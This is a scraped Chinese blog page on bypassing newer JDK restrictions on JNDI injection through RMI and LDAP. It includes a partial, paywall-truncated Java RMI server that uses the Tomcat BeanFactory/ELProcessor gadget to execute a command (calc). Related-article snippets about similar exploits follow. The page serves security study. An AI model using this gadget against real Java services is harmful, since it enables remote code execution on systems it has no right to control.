Bypass JNDI高版本限制

最新推荐文章于 2025-04-01 13:49:01 发布
最新推荐文章于 2025-04-01 13:49:01 发布
阅读量720 收藏
点赞数
分类专栏: java安全 文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_53264525/article/details/122515689
版权
本文详细介绍了如何绕过JNDI利用RMI和LDAP的高版本限制。通过分析JNDI利用RMI的原理,揭示了RMI Client在找不到本地类时会从远程加载,从而可以通过特定类的动态方法调用来执行任意代码。同时,讨论了JNDI利用LDAP的反序列化漏洞,说明了如何构造恶意LDAP Server返回数据来实现远程代码执行。提供了调试和学习的相关资源。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Bypass JNDI高版本限制

老早就知道 JNDI 注入存在高版本限制且有相应的绕过手法了,今天来分析分析绕过高版本限制的两种手法!

前景知识

JNDI 利用 RMI 的版本限制

JNDI 利用 RMI 的版本限制在 com.sun.jndi.rmi.registry.trustURLCodebase/com.sun.jndi.cosnaming.trustURLCodebase 这两个属性上,也就是网上说的 com.sun.jndi.rmi.object.trustURLCodebase/com.sun.jndi.cosnaming.object.trustURLCodebase ,在 JDK 6u132/JDK 7u122/JDK 8u113 以上的版本中这些属性默认为 false ,也就是默认不允许从远程服务器上加载 Reference 的工厂类!

对属性值的检验在 RegistryContext#decodeObject 方法上

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VJaFpaqE-1642250776250)(C:\Users\ky\AppData\Roaming\Typora\typora-user-images\image-20220102161851785.png)]

JNDI 利用 LDAP 的版本限制

JNDI 利用 LDAP 的版本限制在 com.sun.jndi.ldap.VersionHelper12 属性上,也就是网上说的 com.sun.jndi.ldap.object.trustURLCodebase ,在 JDK 11.0.1/JDK 8u191/JDK 7u201/JDK 6u211 以上的版本这些属性默认为 false,也就是默认不允许从远程服务器上加载 Reference 的工厂类!

对属性值的检验在 com.sun.naming.internal#loadClass 方法上

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VOcx1ISo-1642250776256)(C:\Users\ky\AppData\Roaming\Typora\typora-user-images\image-20220102162459852.png)]

JNDI 利用 RMI 实现 Bypass 高版本限制

仔细分析过 JNDI 利用 RMI 的师傅都知道从 RMI Server 中获取到一个 Reference 之后,会先从本地 Classpath 中加载对应的类,如果找不到才从 Reference.classFactoryLocation 中远程加载对应的类!找到对应类之后通过 Class.forName(className,true) 获取 Class,并实例化后强制转换为 ObjectFactory 类然后调用 ObjectFactory.getObjectInstance 方法!所以我们的恶意代码可以放在 静态代码块/构造方法/getObjectInstance方法中

RMI Server

package com.rmi.server;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.apache.naming.ResourceRef;

import javax.naming.StringRefAddr;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServerBypass2 {
   
    public static void main(String[] args) throws Exception{
   
        Registry registry = LocateRegistry.createRegistry(8999);
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        ref.add(new StringRefAddr("forceString", "KINGX=eval"));
        ref.add(new StringRefAddr("KINGX", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','calc']).start()\")"));

        ReferenceWrapper referenceWrapper =
最低0.47元/天 解锁文章
【Java代码审计】JNDI+RMI绕过高版本JDK的限制
大河之犬的博客
03-08 1170
传入的 Reference为 ResourceRef 类,后面通过反射的方式实例化 Reference 所指向的任意 Bean Class,调用 setter 方法为所有的属性赋值,该 Bean Class 的类名、属性、属性值,全都来自于 Reference 对象。因此,实际上我们可以调用任意指定类的任意方法,并指定单个可控的参数。因此,我们实际上可以指定一个存在于目标 classpath 中的工厂类名称,交由这个工厂类去实例化实际的目标类(即引用所指向的类),从而间接实现一定的代码控制。
Java反序列化(之)JNDI注入绕过高版本限制
Vicl1fe的博客
12-30 1043
前言 JNDI注入绕过高版本限制已经被别人玩烂了,我才开始学。参考文章写的特别好。 本文大部分参考https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html JNDI注入 暂时只了解到 JNDI注入分为如下几类 RMI Remote Object Payload(限制较多,不常使用) RMI + JNDI Reference Payload LDAP + JNDI Reference Payload CORBA攻击
JDK高版本JNDI注入绕过
wfz2333的博客
05-22 1638
只启用RMI服务时,这时候RMI客户端能够去打服务端,有两种情况,第一种就是利用服务端本地的gadget,具体要看服务端pom.xml文件比如yso中yso工具中已经集合了很多gadget chain本地利用yso的打rmi注册表的模块 此时在jdk1.7.0_21和jdk1.7.0_25以及jdk1.8.0上都可以成功,然而在一次攻击内网rmi服务的深思这篇文章中说到jdk8u121以后进行了一定的限制 jdk1.8.0_121测试如下:这种防御机制即JEP290,在jdk8u121提出的,简单来说就
JNDI 注入:从零基础到精通,收藏这篇就够了!
最新发布
wananxuexihu的博客
04-01 692
在 Oracle JDK 11.0.1、8u191、7u201、6u211 之后,属性的默认值也被调整为 false,还被分配了一个漏洞编号 CVE-2018-3149。根据的值是否为 true 来进行判断,它的值默认为 false。jdk8u191 之后的版本通过添加trustURLCodebase 的值是否为 true这一判断语句,让我们无法加载 codebase。
JNDI注入高版本绕过
yangyangrenren的专栏
12-22 2705
转载于JNDI注入高版本绕过 JDNI利用方式的修复之路 RMI Remote Object Payload(限制多,不常使用) 攻击者实现一个RMI恶意远程对象并绑定到RMI Registry上,编译后的RMI远程对象类可以放在HTTP/FTP/SMB等服务器上,供受害者的RMI客户端远程加载。RMI客户端在 lookup() 的过程中,会先尝试在本地CLASSPATH中去获取对应的Stub类的定义,并从本地加载,然而如果在本地无法找到,RMI客户端则会向远程Codebase去获取攻击者指定的恶意对象,这
绕过高版本JDK限制JNDI注入
weixin_45682070的博客
01-21 1909
前言 JNDI_RMI在JDK 6u132, JDK 7u122, JDK 8u113版本中,系统属性 com.sun.jndi.rmi.object.trustURLCodebase;com.sun.jndi.cosnaming.object.trustURLCodcbase 的默认值变为false,即默认不允许从远程的Codebase加载Reference工厂类。 JNDI_LDAP在Oracle JDK 6u211、7u201、8u191、11.0.1、之后 com.sun.jndi.ldap.obj
java安全(四) JNDI
weixin_45694388的博客
03-25 9074
JNDI JNDI(Java Naming and Directory Interface)是Java提供的Java 命名和目录接口。通过调用JNDI的API应用程序可以定位资源和其他程序对象。JNDI是Java EE的重要部分,需要注意的是它并不只是包含了DataSource(JDBC 数据源),JNDI可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA 通俗理解,使用jndi作为数据源而不是直接去连接数据库,将数据库交给jndi去配置管理,jndi通过数据源名称去应用数据
JNDI注入和JNDI注入Bypass
weixin_45032957的博客
06-09 400
看这个图,就感觉很清晰. 测试ldap攻击:jdk版本选择:jdk8u73 ,测试环境Mac OS jdk8系列各个版本下载大全:https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html 恶意类:Exploit.java: 复制代码 import javax.naming.Context; import javax.naming.Name; import javax.naming.spi.ObjectFact
JNDI注入利用原理及绕过高版本JDK限制
mole_exp的博客
11-07 8203
文章目录前言JNDI 101什么是JNDI使用JNDI的好处几个简单的JNDI代码示例1、使用JNDI操作RMI2、使用JNDI操作LDAPJNDI动态协议转换JNDI Naming ReferencesJNDI 注入利用RMI向量LDAP向量其他向量绕过高版本JDK限制方式1、利用本地Class作为JNDI Reference Factory方式2、LDAP Server返回序列化数据,触发本地反序列化Gadget坑Reference 前言 关于JNDI注入的讨论和研究,起源于国外的安全研究员@pwnte
高低JDK版本中JNDI注入(上)
m0_61506558的博客
12-05 545
1.2 客户端 直接在 类的函数下打上断点,如图1-1: 调用到函数,尝试从 Reference中获取ObjectFactory,跟进: 这里返回新建的远程类实例之前会先对实例转换为ObjectFactory类,因此,如果远程类不实现ObjectFactory接口类的话就会在此处报错,之前一些demo的恶意类没实现ObjectFactory类所出现的报错正出于此,如图
tomcat中几个版本的JNDI配置
lzg406的博客
01-25 143
当我们用Tomcat5.0.XX时,以Oracle为例,一般我们的配置如下,但直接移到5.5.XX时就会发生错误 Resource name="jdbc/XXX" type="javax.sql.DataSource"/> factory org.apache.commons.dbcp.BasicDataSourceFactory ...
FastjsonJNDI利用及Bypass高版本限制
01-22 712
FastjsonJNDI利用及Bypass高版本限制 Fastjson 在用 parse(obj) 还原对象的属性时会调用对象的 setter 方法为属性赋值,比如要还原 JdbcRowSetImpl 对象的autoCommit 属性,则会调用 JdbcRowSetImpl#setAutoCommit 方法进行还原,而下面的利用也基本都是基于这一点! Fastjson <= 1.2.24 还原 autoCommit 属性时调用 JdbcRowSetImpl#setAutoCommit 方法,setAu
JNDI RMI 注入(Log4j2漏洞)
热门推荐
sun0322
12-24 1万+
目录 ■相关知识 1.SLF4J(Simple logging Facade for Java) // 简单日志门面 ■(log4j2)漏洞 ■JNDI 注入代码实现(RMI) ■代码细节说明 1.javax.naming.Reference // 构造方法 2.代码中使用的服务如何构建 SimpleHTTPServer // (Python)快速共享目录 3.RMI的利用版本限制 4.问答 5.RMI(Remote Method Invocation)为远程方法调用 ●在攻击..
JNDI注入-ldap绕过
07-30 624
传入var4参数,var4在下图中可以看到是在LDAP中查到的一些属性。下面if语句就是判断,拿到的是什么类型,选择相应的方法去decode。我jdk版本是8u141,可以看到这里也是做了trustURLCodebase的系统限制,不能远程加载类。注意这里又跳到DirectoryManager里面去了,和RMI一样攻击点是不在JNDI的文件中的。我弹计算器代码是写在静态代码块儿中的所以在初始化的时候就弹了计算器。这里面调用到了1中的两个方法,也是没有攻击点的。写在构造函数中的会在下面实例化的时候弹计算器。
浅析JNDI注入Bypass
weixin_30894389的博客
06-21 730
之前在Veracode的这篇博客中https://www.veracode.com/blog/research/exploiting-jndi-injections-java看到对于JDK 1.8.0_191以上版本JNDI注入的绕过利用思路,简单分析了下绕过的具体实现,btw也记录下自己的一些想法,本文主要讨论基于Reference对象的利用。 The Past JDK版本:1.8.0_20 产...
通过Tomcat BeanFactory 绕过高版本JDK CodeBase限制实现JNDI注入
Armandhe的博客
05-22 566
通过Tomcat BeanFactory 绕过高版本JDK CodeBase限制实现JNDI注入
Springboot之actuator配置不当漏洞RCE(jolokia)
墨痕诉清风的博客
10-25 5007
日穿扫描扫到一个spring boot actuator 可以看到有jolokia这个端点,再看下jolokia/list,存在type=MBeanFactory 关键字 可以使用jolokia-realm-jndi-rce具体步骤如下 先用python3开一个web服务 python3 -m http.server 8080 编译java利用代码 /** * javac -source 1.5 -target 1.5 JNDIObject.java * * Buil..
Jolokia介绍及使用
yangkei
09-28 2741
Jolokia介绍,使用
《JDK 8u191之后的JNDI注入(LDAP)》学习
公众号shadow sock7
09-27 5300
参考: 8u191之后的JNDI注入(LDAP) JNDI注入,即某代码中存在JDNI的string可控的情况,可构造恶意RMI或者LDAP服务端,导致远程任意类被加载,造成任意代码执行。 JNDI注入中RMI和LDAP与JDK版本的关系,参考这张图: 来源: https://xz.aliyun.com/t/6633 RMI + JNDI Reference利用方式: JDK 6u132, JD...
ByPass 1.13.84版本解压教程与文件夹管理
通常“Bypass”这个词与绕过、跳过等操作相关,可能这个软件具有绕过某些限制、安全检测或者用户验证的功能。这在软件领域中可以涉及许多方面,比如网络代理、安全测试、访问控制等。 ### 压缩包子文件的文件名称...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值